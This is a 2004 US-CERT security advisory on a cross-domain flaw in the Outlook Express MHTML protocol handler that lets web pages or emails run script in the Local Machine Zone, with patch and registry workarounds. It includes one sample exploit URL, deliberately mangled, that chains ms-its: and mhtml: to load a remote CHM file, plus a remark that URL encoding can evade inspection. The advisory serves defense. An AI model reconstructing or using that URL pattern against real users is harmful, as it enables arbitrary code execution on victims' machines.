Cross-Domain Vulnerability in Outlook Express MHTML Protocol Handler

Systems Affected

• Microsoft Windows systems

Overview

A cross-domain vulnerability in the Outlook Express MIME Encapsulation of Aggregate HTML Documents (MHTML) protocol handler could allow an attacker to execute arbitrary code with the privileges of the user invoking the handler. The attacker may also be able to read and manipulate data on web sites in other domains or zones.

I. Description

There is a cross-domain vulnerability in the way the Outlook Express MHTML protocol handler (mhtml:) determines the security domain of data referenced by a URL that specifies an alternate location. When the MHTML handler references an inaccessible or non-existent file, the handler can access a file from an alternate location. The MHTML handler incorrectly treats the file from the alternate location as if it were in the same domain as the unavailable file.

The MHTML protocol handler is considered to be part of Outlook Express and is installed by default on all current Windows systems. The MHTML protocol handler is effectively a shared Windows component. Any program that exposes an MHTML protocol reference to the operating system will invoke the handler, typically using Internet Explorer (IE).

Programs that use the WebBrowser ActiveX control or the IE HTML rendering engine (MSHTML) may be affected by this vulnerability. Internet Explorer, Outlook, and Outlook Express are all examples of such programs.

US-CERT is tracking this issue as VU#323070. This reference number corresponds to CVE candidate CAN-2004-0380.

II. Impact

By convincing a victim to view an HTML document such as a web page or HTML email message, an attacker could access data or execute script in a different security domain than the one containing the attacker's document. By causing script to be run in the Local Machine Zone, the attacker could execute arbitrary code with the privileges of the user invoking the MHTML handler. The attacker may also be able to read or modify data in other web sites (including reading cookies or content and modifying or creating content).

Publicly available exploit code exists for this vulnerability. US-CERT has monitored incident reports that indicate that this vulnerability is being exploited. The Ibiza trojan, variants of W32/Bugbear, and BloodHound.Exploit.6 are some examples of malicious code that exploit this vulnerability. Any arbitrary payload could be delivered via this vulnerability, and different anti-virus vendors may identify malicious code with different names.

Most of the observed exploit code uses InfoTech Storage (ITS) protocol handlers and Compiled HTML Help (CHM) files to parse an HTML file in the Local Machine Zone. CHM files use the InfoTech Storage (ITS) format to store components such as HTML files, graphic files, and ActiveX objects, and Windows provides several protocol handlers that can access ITS files and individual CHM components: its:, ms-its:, ms-itss:, and mk:@MSITStore:.

When referencing an inaccessible or non-existent MHTML file using the ITS and mhtml: protocols, IE can access a CHM file from an alternate location. Because of the vulnerability in the MHTML handler, IE incorrectly treats the CHM file as if it were in the same domain as the unavailable MHTML file. Using a specially crafted URL, an attacker can cause arbitrary script in a CHM file to be executed in a different domain, violating the cross-domain security model.

A malicious web site or email message may contain HTML similar to the following:

ms-_its:_mhtml:_file://C:\nosuchfile.mht!_http://www.example.com//exploit._chm::exploit.html
(This URL is intentionally modified to avoid detection by anti-virus software.)

Note that it is possible to encode a URL in an attempt to bypass HTTP content inspection or anti-virus software.

III. Solution

Install the appropriate cumulative patch for Outlook Express according to Microsoft Security Bulletin MS04-013.

Disabling the ITS and MHTML protocol handlers appears to prevent exploitation of this vulnerability. Delete or rename the following registry keys:

HKEY_LOCAL_MACHINE\SOFTWARE\Classes\PROTOCOLS\Handler\{ms-its,ms-itss,its,mk,mhtml}

These recommended security practices will help to reduce exposure to attacks and mitigate the impact of cross-domain vulnerabilities. Additional recommendations can be found under Mitigating factors and Workarounds in the Vulnerability Details section of MS04-013.

• Disable Active scripting and ActiveX controls
  
  NOTE: Disabling Active scripting and ActiveX controls will not prevent the exploitation of this vulnerability.
  
  Disabling Active scripting and ActiveX controls in the Internet and Local Machine Zones may stop certain types of attacks and will prevent exploitation of different cross-domain vulnerabilities. Disable Active scripting and ActiveX controls in any zones used to read HTML email.
  
  Disabling Active scripting and ActiveX controls in the Local Machine Zone will prevent malicious code that requires Active scripting and ActiveX controls from running. Changing these settings may reduce the functionality of scripts, applets, Windows components, or other applications. See Microsoft Knowledge Base Article 833633 for detailed information about security settings for the Local Machine Zone. Note that Service Pack 2 for Windows XP includes these changes.

• Do not follow unsolicited links

  Do not click on unsolicited URLs received in email, instant messages, web forums, or Internet relay chat (IRC) channels.

• Maintain updated anti-virus software

  Anti-virus software with updated virus definitions may identify and prevent some exploit attempts. Variations of exploits or attack vectors may not be detected. Do not rely solely on anti-virus software to defend against this vulnerability. More information about viruses and anti-virus vendors is available on the US-CERT Computer Virus Resources page.

Appendix A. Vendor Information

Microsoft Corporation

Please see Microsoft Security Bulletin MS04-013.

Appendix B. References

• Vulnerability Note VU#323070 - <http://www.kb.cert.org/vuls/id/323070>
• US-CERT Computer Virus Resources - <http://www.us-cert.gov/other_sources/viruses.html>
• CVE CAN-2004-0380 - <http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0380>
• Microsoft Security Bulletin MS04-013 - <http://www.microsoft.com/technet/security/bulletin/ms04-013.mspx>
• Introduction to URL Security Zones - <http://msdn.microsoft.com/workshop/security/szone/overview/overview.asp>
• About Cross-Frame Scripting and Security - <http://msdn.microsoft.com/workshop/author/om/xframe_scripting_security.asp>
• MIME Type Determination in Internet Explorer - <http://msdn.microsoft.com/workshop/networking/moniker/overview/appendix_a.asp>
• URL Monikers - <http://msdn.microsoft.com/workshop/networking/moniker/monikers.asp>
• Asynchronous Pluggable Protocols - <http://msdn.microsoft.com/workshop/networking/pluggable/pluggable.asp>
• Microsoft HTML Help 1.4 SDK - <http://msdn.microsoft.com/library/en-us/htmlhelp/html/vsconHH1Start.asp>
• Microsoft Knowledge Base Article 182569 - <http://support.microsoft.com/default.aspx?scid=182569>
• Microsoft Knowledge Base Article 174360 - <http://support.microsoft.com/default.aspx?scid=174360>
• Microsoft Knowledge Base Article 833633 - <http://support.microsoft.com/default.aspx?scid=833633>
• Windows XP Service Pack 2 Technical Preview - <http://www.microsoft.com/technet/prodtechnol/winxppro/sp2preview.mspx>
• AusCERT Update AU-2004.007 - <http://www.auscert.org.au/3990>

This vulnerability was reported by Liu Die Yu. Thanks to http-equiv for additional research and collaboration.

Feedback can be directed to the author: Art Manion.

Copyright 2004 Carnegie Mellon University. Terms of use.

Revision History

April 8, 2004: Initial release
April 13, 2004: Added patch and vendor information (MS04-013), credited Liu Die Yu, updated vulnerability, impact, and workaround information about MHTML
April 23. 2004: Thanked http-equiv April 26, 2004: Further modified sample exploit URL to minimize AV detection